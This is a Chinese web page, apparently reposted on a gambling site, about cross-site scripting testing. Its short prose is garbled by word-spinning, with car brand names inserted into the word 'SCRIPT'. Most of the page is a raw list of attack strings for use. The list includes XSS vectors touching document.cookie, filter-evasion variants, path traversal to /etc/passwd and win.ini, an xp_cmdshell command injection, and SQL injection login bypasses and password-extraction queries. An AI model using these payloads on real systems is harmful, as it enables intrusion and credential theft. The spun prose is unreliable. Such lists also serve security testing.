澳门威利斯人_威利斯人娱乐「手机版」

来自 网络资讯 2019-09-16 19:56 的文章
当前位置: 澳门威利斯人 > 网络资讯 > 正文

威尼斯手机棋牌关于跨站脚本攻击问题,XSS攻击

相似的抨击便是写一段脚本看是还是不是能实行,就会判别是还是不是是攻击了,举个例子说作者写<script> alert("实施了本身了啊!!!"); </script>,然后看看当页面加载的时候是或不是能实施,就行了。方今截至一般的网址这段代码都不会实行,可是换一种方法吗?

这段时间在做的类其他时候,安全检查实验的同事做了XSS攻击,不看不掌握,一看吓一跳。这玩意还确实是很恶心。导致网址各类无缘无故的面世bug。上面是一些足以展开XSS攻击的代码。

举个例子说<SC本田CR-VIPT>alert(String.fromCharCode(88,83,83))</SC奥迪Q7IPT>,估量也米有多少个网址实行呢,咱们都精晓的。

 

上边看更猥琐的测量试验例子, '';!--"<XSS>=&{()} ,那一个是测验是或不是会有xxs好例子,再试一下看看有多少个网址能抗的住,上面是自己任由写的贰个事例,然后测量检验多少个网址看看,

'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>

<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
<script>alert("Vulnerable")</script>.jsp
"
../../../../../../../etc/passwd
../../../../../windows/win.ini


/index.html
?.jsp
?.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec master..xp_cmdshell 'dir c: > c:inetpubwwwroot?.txt'--&&
">
&
&SESSION_ID={SESSION_ID}&SESSION_ID=
1 union all select pass,0,0,0,0 from customers where fname=

................windowssystem.ini
................windowssystem.ini
'';!--"<XSS>=&{()}
<IMG src="javascript:alert('XSS');">
<IMG src=javascript:alert('XSS')>
<IMG src=JaVaScRiPt:alert('XSS')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
"<IMG src=java\0script:alert("XSS")>";' > out
<IMG src=" javascript:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND src="javascript:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER src=";
<LINK REL="stylesheet" href="javascript:alert('XSS');">
<IMG src='vbscript:msgbox("XSS")'>
<IMG src="mocha:[code]">
<IMG src="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME src=javascript:alert('XSS')></IFRAME>
<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="behaviour: url(';
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@import'javascript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE href="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a b c d);
<XML src="javascript:alert('XSS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT src=";
<IMG src="javascript:alert('XSS')"
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=;
<IMG src=";
<SCRIPT a=">" src=";
<SCRIPT =">" src=";
<SCRIPT a=">" '' src=";
<SCRIPT "a='>'" src=";
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src=";
<A href=;
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a[/code]

本文由澳门威利斯人发布于网络资讯,转载请注明出处:威尼斯手机棋牌关于跨站脚本攻击问题,XSS攻击

关键词: 澳门威利斯人